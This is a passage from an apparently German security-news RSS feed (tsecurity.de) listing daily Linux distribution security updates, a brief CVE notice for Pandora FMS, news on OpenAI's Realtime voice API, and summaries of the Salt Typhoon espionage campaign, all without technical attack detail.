<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (ipa, kernel, and thunderbird), <b>Debian</b> (gdk-pixbuf, gegl, gimp, intel-microcode, raptor2, request-tracker4, and request-tracker5), <b>Fedora</b> (samba and wireshark), <b>Mageia</b> (haproxy, nginx, openssl, and python-django), <b>Oracle</b> (kernel and thunderbird), <b>Red Hat</b> (redis and redis:7), <b>Slackware</b> (bind), <b>SUSE</b> (aws-cli, local-npm-registry, python-boto3, python- botocore, python-coverage, python-flaky, python-pluggy, python-pytest, python- pytest-cov, python-pytest-html, python-pytest-metada, cargo-audit-advisory-db-20251021, fetchmail, git-bug, ImageMagick, istioctl, kernel, krb5, libsoup, libxslt, python-Authlib, and sccache), and <b>Ubuntu</b> (bind9, linux, linux-aws, linux-azure, linux-azure-6.8, linux-gcp, linux-gkeop,
 linux-ibm, linux-ibm-6.8, linux-lowlatency, linux-lowlatency-hwe-6.8,
 linux-oracle, linux-azure, linux-azure-5.15, linux-gcp-5.15, linux-gcp-6.8, linux-gke, linux-nvidia, linux-nvidia-6.8,
 linux-nvidia-lowlatency, and linux-realtime, linux-realtime-6.8).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by Fedora (inih, mingw-exiv2, and mod_http2), SUSE (ffmpeg-4, kernel, libqt5-qtbase, protobuf, python-ldap, and python313), and Ubuntu (erlang, ffmpeg, linux, linux-aws, linux-gcp, linux-oem-6.14, linux-oracle,
 linux-oracle-6.14, linux-raspi, linux-realtime, lin...]]></description>
<link>https://tsecurity.de/de/3055465/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3055465/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 22 Oct 2025 15:52:45 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Fedora</b> (inih, mingw-exiv2, and mod_http2), <b>SUSE</b> (ffmpeg-4, kernel, libqt5-qtbase, protobuf, python-ldap, and python313), and <b>Ubuntu</b> (erlang, ffmpeg, linux, linux-aws, linux-gcp, linux-oem-6.14, linux-oracle,
 linux-oracle-6.14, linux-raspi, linux-realtime, linux-aws, linux-azure, linux-azure-6.14, linux-azure-nvidia-6.14, linux-azure-fips, linux-oracle-5.4, and linux-realtime-6.14).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (.NET 8.0, firefox, kernel, kernel-rt, libssh, and perl-JSON-XS), Debian (ark and libphp-adodb), Fedora (chromium and gi-docgen), Mageia (quictls), Oracle (.NET 8.0, .NET 9.0, firefox, httpd, kernel, libsoup3, libssh, microcode_ctl, and webkit2gtk3),...]]></description>
<link>https://tsecurity.de/de/3053322/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3053322/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 21 Oct 2025 16:08:01 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (.NET 8.0, firefox, kernel, kernel-rt, libssh, and perl-JSON-XS), <b>Debian</b> (ark and libphp-adodb), <b>Fedora</b> (chromium and gi-docgen), <b>Mageia</b> (quictls), <b>Oracle</b> (.NET 8.0, .NET 9.0, firefox, httpd, kernel, libsoup3, libssh, microcode_ctl, and webkit2gtk3), <b>SUSE</b> (go1.24, go1.25, krb5, python-ldap, and webkit2gtk3), and <b>Ubuntu</b> (gst-plugins-base1.0, linux, linux-aws, linux-gcp, linux-gke, linux-gkeop, linux-hwe-5.15,
 linux-ibm, linux-ibm-5.15, linux-lowlatency, linux-lowlatency-hwe-5.15,
 linux-nvidia, linux-oracle, linux-oracle-5.15, linux-xilinx-zynqmp, linux-fips, linux-aws-fips, linux-azure-fips, linux-gcp-fips,
 linux-intel-iot-realtime, linux-realtime, and python-ldap).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (idm:DL1), Debian (gegl and haproxy), Fedora (ffmpeg, firefox, freeipa, python-pip, rust-astral-tokio-tar, sqlite, uv, webkitgtk, and xen), Oracle (idm:DL1, ipa, kernel, perl-JSON-XS, and python3), Red Hat (git), SUSE (curl, frr, jupyter-jupyterlab, ...]]></description>
<link>https://tsecurity.de/de/3019100/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3019100/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 03 Oct 2025 15:34:44 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (idm:DL1), <b>Debian</b> (gegl and haproxy), <b>Fedora</b> (ffmpeg, firefox, freeipa, python-pip, rust-astral-tokio-tar, sqlite, uv, webkitgtk, and xen), <b>Oracle</b> (idm:DL1, ipa, kernel, perl-JSON-XS, and python3), <b>Red Hat</b> (git), <b>SUSE</b> (curl, frr, jupyter-jupyterlab, and libsuricata8_0_1), and <b>Ubuntu</b> (linux-aws, linux-lts-xenial, linux-aws-fips, linux-fips, linux-gcp-fips, linux-azure, linux-azure, linux-azure-6.8, linux-fips, linux-gcp-fips, and linux-intel-iot-realtime, linux-realtime).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (perl-JSON-XS), Debian (chromium and openssl), Fedora (bird, dnsdist, firefox, mapserver, ntpd-rs, python-nh3, rust-ammonia, skopeo, sqlite, thunderbird, and xen), Oracle (perl-JSON-XS), Red Hat (kernel, kernel-rt, and libvpx), SUSE (afterburn, cairo...]]></description>
<link>https://tsecurity.de/de/3017308/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3017308/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 02 Oct 2025 16:37:15 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (perl-JSON-XS), <b>Debian</b> (chromium and openssl), <b>Fedora</b> (bird, dnsdist, firefox, mapserver, ntpd-rs, python-nh3, rust-ammonia, skopeo, sqlite, thunderbird, and xen), <b>Oracle</b> (perl-JSON-XS), <b>Red Hat</b> (kernel, kernel-rt, and libvpx), <b>SUSE</b> (afterburn, cairo, docker-stable, firefox, nginx, python-Django, snpguest, and warewulf4), and <b>Ubuntu</b> (libmspack, libxslt, linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iotg, linux-intel-iotg-5.15, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-oracle, linux-raspi, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-5.4, linux-bluefield, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-iot, linux-kvm, linux-raspi, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-6.14, linux-hwe-6.14, linux-realtime, linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, linux-hwe, linux-oracle, linux, linux-aws, linux-gcp, linux-gcp-6.8, linux-gke, linux-gkeop, linux-ibm, linux-ibm-6.8, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux, linux-kvm, linux-aws-fips, linux-fips, linux-gcp-fips, linux-azure, linux-hwe-6.8, linux-kvm, linux-oracle-5.15, linux-oracle-6.14, linux-raspi, linux-raspi-realtime, linux-realtime, linux-realtime-6.8, linux-realtime-6.14, and python-django).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (firefox, kernel, and thunderbird), Debian (ceph and thunderbird), Fedora (chromium, mingw-expat, python-deepdiff, python-orderly-set, python-pip, rust-az-cvm-vtpm, rust-az-snp-vtpm, rust-az-tdx-vtpm, and trustee-guest-components), Oracle (aide, kern...]]></description>
<link>https://tsecurity.de/de/3006303/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3006303/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 26 Sep 2025 15:51:51 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (firefox, kernel, and thunderbird), <b>Debian</b> (ceph and thunderbird), <b>Fedora</b> (chromium, mingw-expat, python-deepdiff, python-orderly-set, python-pip, rust-az-cvm-vtpm, rust-az-snp-vtpm, rust-az-tdx-vtpm, and trustee-guest-components), <b>Oracle</b> (aide, kernel, and thunderbird), <b>Red Hat</b> (firefox, kernel, openssh, perl-YAML-LibYAML, and thunderbird), <b>Slackware</b> (expat), <b>SUSE</b> (jasper, libssh, openjpeg2, and python-pycares), and <b>Ubuntu</b> (linux-aws-6.14, linux-hwe-6.14, linux-azure, linux-hwe-6.8, linux-realtime-6.8, node-sha.js, and pcre2).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (grub2 and kernel), Debian (chromium and libxslt), Fedora (chromium, expat, libssh, and webkitgtk), Oracle (avahi, firefox, ImageMagick, kernel, libtpms, and mysql), Red Hat (kernel), SUSE (bird3, expat, kernel, and tiff), and Ubuntu (dpkg, gnuplot, ...]]></description>
<link>https://tsecurity.de/de/3004316/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3004316/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 25 Sep 2025 16:51:53 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (grub2 and kernel), <b>Debian</b> (chromium and libxslt), <b>Fedora</b> (chromium, expat, libssh, and webkitgtk), <b>Oracle</b> (avahi, firefox, ImageMagick, kernel, libtpms, and mysql), <b>Red Hat</b> (kernel), <b>SUSE</b> (bird3, expat, kernel, and tiff), and <b>Ubuntu</b> (dpkg, gnuplot, linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iotg, linux-intel-iotg-5.15, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-oracle, linux-raspi, linux-riscv-5.15, linux-xilinx-zynqmp, linux, linux-aws, linux-gcp, linux-gcp-6.14, linux-oracle, linux-realtime, linux-riscv, linux-riscv-6.14, linux-aws-fips, linux-fips, linux-gcp-fips, linux-azure, linux-azure-fips, linux-ibm, linux-ibm-6.8, linux-intel-iot-realtime, linux-realtime, linux-oem-6.14, linux-oracle-5.15, linux-realtime-6.14, and python-eventlet).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (kernel and kernel-rt), Fedora (expat), Red Hat (kernel and multiple packages), SUSE (avahi, busybox, busybox-links, kernel, sevctl, tcpreplay, thunderbird, and tor), and Ubuntu (isc-kea, linux, linux-aws, linux-gcp, linux-gke, linux-gkeop, linux-low...]]></description>
<link>https://tsecurity.de/de/3001973/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3001973/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 24 Sep 2025 15:22:06 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (kernel and kernel-rt), <b>Fedora</b> (expat), <b>Red Hat</b> (kernel and multiple packages), <b>SUSE</b> (avahi, busybox, busybox-links, kernel, sevctl, tcpreplay, thunderbird, and tor), and <b>Ubuntu</b> (isc-kea, linux, linux-aws, linux-gcp, linux-gke, linux-gkeop, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-aws-6.8, linux-gcp-6.8, linux-aws-fips, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-realtime, python-pip, and rabbitmq-server).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by Debian (chromium, cjson, and firefox-esr), Fedora (expat, gh, scap-security-guide, and xen), Oracle (container-tools:rhel8, firefox, grub2, and mysql:8.4), SUSE (busybox, busybox-links, element-web, kernel, shadowsocks-v2ray-plugin, and yt-dlp), and Ubuntu (im...]]></description>
<link>https://tsecurity.de/de/2993464/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2993464/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 19 Sep 2025 15:21:40 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (chromium, cjson, and firefox-esr), <b>Fedora</b> (expat, gh, scap-security-guide, and xen), <b>Oracle</b> (container-tools:rhel8, firefox, grub2, and mysql:8.4), <b>SUSE</b> (busybox, busybox-links, element-web, kernel, shadowsocks-v2ray-plugin, and yt-dlp), and <b>Ubuntu</b> (imagemagick, linux, linux-aws, linux-gcp, linux-gke, linux-gkeop, linux-hwe-6.8, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-oracle, linux-azure, linux-azure-5.15, linux-azure-fips, linux-ibm, linux-ibm-6.8, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-raspi, linux-oracle-6.8, linux-realtime, and openjpeg2).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-35307 | Artica Pandora FMS up to 776 Realtime Graph Extension argument injection]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in Artica Pandora FMS up to 776. This affects an unknown function of the component Realtime Graph Extension. The manipulation results in argument injection.

This vulnerability is known as CVE-2024-35307. It is possible to launch the att...]]></description>
<link>https://tsecurity.de/de/2987725/sicherheitsluecken/cve-2024-35307-artica-pandora-fms-up-to-776-realtime-graph-extension-argument-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2987725/sicherheitsluecken/cve-2024-35307-artica-pandora-fms-up-to-776-realtime-graph-extension-argument-injection/</guid>
<pubDate>Tue, 16 Sep 2025 20:37:36 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/?kb.risk">critical</a> has been discovered in <a href="https://vuldb.com/?product.artica:pandora_fms">Artica Pandora FMS up to 776</a>. This affects an unknown function of the component <em>Realtime Graph Extension</em>. The manipulation results in argument injection.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.267661">CVE-2024-35307</a>. It is possible to launch the attack remotely. No exploit is available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Build Hour: Voice Agents]]></title>
<description><![CDATA[Author: OpenAI - Bewertung: 151x - Views:6506 Voice agents don’t just transcribe anymore — they think, talk, and call tools in real time.

This Build Hour demos speech-to-speech agents built with the Realtime API and Agents SDK that can handle conversations natively in audio, reason about context...]]></description>
<link>https://tsecurity.de/de/2968492/videos/build-hour-voice-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2968492/videos/build-hour-voice-agents/</guid>
<pubDate>Sat, 06 Sep 2025 23:22:41 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/rpj1m0wYs8M/hqdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<p>Author: OpenAI - Bewertung: 151x - Views:6506 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/rpj1m0wYs8M?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Voice agents don’t just transcribe anymore — they think, talk, and call tools in real time.<br />
<br />
This Build Hour demos speech-to-speech agents built with the Realtime API and Agents SDK that can handle conversations natively in audio, reason about context, and call tools while streaming speech back to the user.<br />
<br />
Brian Fioca and Prashant Mital (Applied AI) cover:<br />
- Why voice agents now: APIs to the real world, expressive + accessible interactions<br />
- Architectures: chained speech-to-text vs. end-to-end speech-to-speech models<br />
- Live demo: building a voice-powered workspace manager + designer agent with handoffs<br />
- Best practices: evals, guardrails, and delegation<br />
- Live Q&A<br />
<br />
👉 Follow along with the code repo: https://github.com/openai/build-hours<br />
👉 Check out the voice agents guide: https://platform.openai.com/docs/guides/voice-agents<br />
👉 Sign up for upcoming live Build Hours: https://webinar.openai.com/buildhours<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[gpt-realtime: Das Ende der Callcenter rückt näher]]></title>
<description><![CDATA[Der Beitrag gpt-realtime: Das Ende der Callcenter rückt näher erschien zuerst beim Online-Magazin BASIC thinking. Über unseren Newsletter UPDATE startest du jeden Morgen bestens informiert in den Tag.
Mit gpt-realtime hat OpenAI ein neues, fortgeschrittenes Speech-to-Speech-Modell vorgestellt. Da...]]></description>
<link>https://tsecurity.de/de/2968122/it-nachrichten/gpt-realtime-das-ende-der-callcenter-rueckt-naeher/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2968122/it-nachrichten/gpt-realtime-das-ende-der-callcenter-rueckt-naeher/</guid>
<pubDate>Sat, 06 Sep 2025 23:18:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Der Beitrag <a href="https://www.basicthinking.de/blog/2025/09/05/gpt-realtime-ki-kundenservice/">gpt-realtime: Das Ende der Callcenter rückt näher</a> erschien zuerst beim Online-Magazin <a href="https://www.basicthinking.de/blog">BASIC thinking</a>. Über <a href="https://www.basicthinking.de/blog/update/" target="_blank">unseren Newsletter UPDATE</a> startest du jeden Morgen bestens informiert in den Tag.</p>
<p>Mit gpt-realtime hat OpenAI ein neues, fortgeschrittenes Speech-to-Speech-Modell vorgestellt. Damit lassen sich Sprach-Assistenten bauen, die selbstständig und zuverlässig Gespräche führen und protokollieren können. Es stellt sich die Frage: Was passiert mit den vielen Support-Mitarbeitern? Hintergrund: gpt-realtime als Support-Ersatz Ende August hat OpenAI gpt-realtime und die dazugehörige Realtime API veröffentlicht. Dabei handelt es sich um ein sogenanntes […]</p>
<p>Der Beitrag <a href="https://www.basicthinking.de/blog/2025/09/05/gpt-realtime-ki-kundenservice/">gpt-realtime: Das Ende der Callcenter rückt näher</a> erschien zuerst auf <a href="https://www.basicthinking.de/blog">BASIC thinking</a>. Folge uns auch auf <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV0poYzJsamRHaHBibXRwYm1jdVpHVXZZbXh2WnlnQVAB" target="_blank">Google News</a> und <a href="https://flipboard.com/@BASICthinking" target="_blank">Flipboard</a> oder abonniere <a href="https://www.basicthinking.de/blog/update/" target="_blank">unseren Newsletter UPDATE</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (aide, fence-agents, firefox, kernel-rt, python-cryptography, and thunderbird), Debian (golang-github-gin-contrib-cors, libxml2, and udisks2), Fedora (chromium), Oracle (postgresql16, postgresql:16, python3.11, and thunderbird), Red Hat (lz4 and mpfr...]]></description>
<link>https://tsecurity.de/de/2964794/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2964794/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 29 Aug 2025 16:06:55 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (aide, fence-agents, firefox, kernel-rt, python-cryptography, and thunderbird), <b>Debian</b> (golang-github-gin-contrib-cors, libxml2, and udisks2), <b>Fedora</b> (chromium), <b>Oracle</b> (postgresql16, postgresql:16, python3.11, and thunderbird), <b>Red Hat</b> (lz4 and mpfr), <b>SUSE</b> (chromium, docker, dpkg, firefox, gdk-pixbuf, git, git, git-lfs, obs-scm-bridge, python-PyYAML, gnutls, kernel, kernel-livepatch-MICRO-6-0-RT_Update_2, kernel-livepatch-MICRO-6-0-RT_Update_3, kernel-livepatch-MICRO-6-0-RT_Update_4, kernel-livepatch-MICRO-6-0-RT_Update_5, kernel-livepatch-MICRO-6-0-RT_Update_6, kernel-livepatch-MICRO-6-0-RT_Update_7, kernel-livepatch-MICRO-6-0-RT_Update_8, kernel-livepatch-MICRO-6-0_Update_10, kernel-livepatch-MICRO-6-0_Update_2, kernel-livepatch-MICRO-6-0_Update_3, kernel-livepatch-MICRO-6-0_Update_4, kernel-livepatch-MICRO-6-0_Update_5, kernel-livepatch-MICRO-6-0_Update_6, kernel-livepatch-MICRO-6-0_Update_7, kernel-livepatch-MICRO-6-0_Update_8, kernel-livepatch-MICRO-6-0_Update_9, libarchive, libxml2, net-tools, netty, perl-Crypt-CBC, polkit, postgresql14, postgresql15, sqlite3, thunderbird, tomcat10, and udisks2), and <b>Ubuntu</b> (linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gkeop,
 linux-hwe-5.15, linux-ibm, linux-intel-iotg, linux-intel-iotg-5.15,
 linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia,
 linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx,
 linux-oracle, linux-raspi, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-6.14, linux-gcp, linux-hwe-6.14, linux-raspi,
 linux-realtime, linux-realtime-6.14, linux, linux-aws, linux-aws-6.8, linux-gcp, linux-lowlatency,
 linux-lowlatency-hwe-6.8, linux-oracle, linux-oracle-6.8, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-azure, linux-fips, linux-fips, linux-aws-fips, linux-gcp-fips, linux-gke, linux-hwe-6.8, linux-nvidia, linux-nvidia-6.8,
 linux-nvidia-lowlatency, linux-raspi, linux-gke, linux-kvm, linux-oem-6.14, linux-realtime, linux-intel-iot-realtime, linux-realtime, linux-raspi-realtime, openldap, and udisks2).]]></content:encoded>
</item>
<item>
<title><![CDATA[Stealth in the Storm! Breaking Down Salt Typhoon’s Global Cyber Campaign]]></title>
<description><![CDATA[Executive Summary Salt Typhoon, a China-linked advanced persistent threat (APT) group, has been conducting a persistent cyber-espionage campaign since at least 2019. The group targets telecommunications providers, government agencies, transportation, lodging, and military infrastructure worldwide...]]></description>
<link>https://tsecurity.de/de/2964175/it-security-nachrichten/stealth-in-the-storm-breaking-down-salt-typhoons-global-cyber-campaign/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2964175/it-security-nachrichten/stealth-in-the-storm-breaking-down-salt-typhoons-global-cyber-campaign/</guid>
<pubDate>Fri, 29 Aug 2025 11:05:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Executive Summary Salt Typhoon, a China-linked advanced persistent threat (APT) group, has been conducting a persistent cyber-espionage campaign since at least 2019. The group targets telecommunications providers, government agencies, transportation, lodging, and military infrastructure worldwide, exploiting vulnerabilities in network edge devices from Cisco, Ivanti, and Palo Alto Networks to gain and maintain access. By modifying […]</p>
<p>The post <a href="https://www.secpod.com/blog/stealth-in-the-storm-breaking-down-salt-typhoons-global-cyber-campaign/">Stealth in the Storm! Breaking Down Salt Typhoon’s Global Cyber Campaign</a> appeared first on <a href="https://www.secpod.com/blog">SecPod Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Releases an Advanced Speech-to-Speech Model and New Realtime API Capabilities including MCP Server Support, Image Input, and SIP Phone Calling Support]]></title>
<description><![CDATA[OpenAI has officially launched Realtime API and gpt-realtime, its most advanced speech-to-speech model, moving the Realtime API out of beta with a suite of enterprise-focused features. While the announcement marks real progress in voice AI technology, a closer examination reveals both meaningful ...]]></description>
<link>https://tsecurity.de/de/2964092/ai-nachrichten/openai-releases-an-advanced-speech-to-speech-model-and-new-realtime-api-capabilities-including-mcp-server-support-image-input-and-sip-phone-calling-support/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2964092/ai-nachrichten/openai-releases-an-advanced-speech-to-speech-model-and-new-realtime-api-capabilities-including-mcp-server-support-image-input-and-sip-phone-calling-support/</guid>
<pubDate>Fri, 29 Aug 2025 10:20:12 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenAI has officially launched Realtime API and gpt-realtime, its most advanced speech-to-speech model, moving the Realtime API out of beta with a suite of enterprise-focused features. While the announcement marks real progress in voice AI technology, a closer examination reveals both meaningful improvements and persistent challenges that temper any revolutionary claims. Technical Architecture and Performance […]</p>
<p>The post <a href="https://www.marktechpost.com/2025/08/29/openai-releases-an-advanced-speech-to-speech-model-and-new-realtime-api-capabilities-including-mcp-server-support-image-input-and-sip-phone-calling-support/">OpenAI Releases an Advanced Speech-to-Speech Model and New Realtime API Capabilities including MCP Server Support, Image Input, and SIP Phone Calling Support</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI: Realtime API startet offiziell mit deutlich besserem Voice-Agent und mehr]]></title>
<description><![CDATA[OpenAI macht die Realtime API jetzt für alle Entwickler verfügbar und packt ordentlich neue Features obendrauf. Mit gpt-realtime kommt das bisher leistungsfähigste Speech-to-Speech-Modell, das komplexeren Anweisungen besser folgt, natürlicher klingt und sogar zwischen Sprachen in Echtzeit wechsel...]]></description>
<link>https://tsecurity.de/de/2963965/it-nachrichten/openai-realtime-api-startet-offiziell-mit-deutlich-besserem-voice-agent-und-mehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2963965/it-nachrichten/openai-realtime-api-startet-offiziell-mit-deutlich-besserem-voice-agent-und-mehr/</guid>
<pubDate>Fri, 29 Aug 2025 09:16:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI macht die Realtime API jetzt für alle Entwickler verfügbar und packt ordentlich neue Features obendrauf. Mit gpt-realtime kommt das bisher leistungsfähigste Speech-to-Speech-Modell, das komplexeren Anweisungen besser folgt, natürlicher klingt und sogar zwischen Sprachen in Echtzeit wechseln kann. Die Latenz...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/openai-realtime-api-startet-offiziell-mit-deutlich-besserem-voice-agent-und-mehr/">OpenAI: Realtime API startet offiziell mit deutlich besserem Voice-Agent und mehr</a>
</p><p>

Du kannst uns mit jedem deiner Käufe über Amazon unterstützen. Dein Preis bleibt gleich, wir erhalten eine kleine Provision. <a href="https://www.amazon.de/shop/carsten">Nutze einfach diesen Link</a>. Danke dafür!</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Salt Typhoon Exploits Cisco, Ivanti, Palo Alto Flaws to Breach 600 Organizations Worldwide]]></title>
<description><![CDATA[The China-linked advanced persistent threat (APT) actor known as Salt Typhoon has continued its attacks targeting networks across the world, including organizations in the telecommunications, government, transportation, lodging, and military infrastructure sectors.
"While these actors focus on la...]]></description>
<link>https://tsecurity.de/de/2962815/it-security-nachrichten/salt-typhoon-exploits-cisco-ivanti-palo-alto-flaws-to-breach-600-organizations-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2962815/it-security-nachrichten/salt-typhoon-exploits-cisco-ivanti-palo-alto-flaws-to-breach-600-organizations-worldwide/</guid>
<pubDate>Thu, 28 Aug 2025 16:50:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The China-linked advanced persistent threat (APT) actor known as Salt Typhoon has continued its attacks targeting networks across the world, including organizations in the telecommunications, government, transportation, lodging, and military infrastructure sectors.
"While these actors focus on large backbone routers of major telecommunications providers, as well as provider edge (PE) and]]></content:encoded>
</item>
<item>
<title><![CDATA[NSA, NCSC, and allies detailed TTPs associated with Chinese APT actors targeting critical infrastructure Orgs]]></title>
<description><![CDATA[NSA and allies warn that Chinese APT actors, including Salt Typhoon, are targeting critical infrastructure worldwide. The U.S. National Security Agency (NSA), the UK’s National Cyber Security Centre (NCSC), and allies warn Chinese APT actors, linked to Salt Typhoon, are targeting global telecom, ...]]></description>
<link>https://tsecurity.de/de/2962412/hacking/nsa-ncsc-and-allies-detailed-ttps-associated-with-chinese-apt-actors-targeting-critical-infrastructure-orgs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2962412/hacking/nsa-ncsc-and-allies-detailed-ttps-associated-with-chinese-apt-actors-targeting-critical-infrastructure-orgs/</guid>
<pubDate>Thu, 28 Aug 2025 13:50:04 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
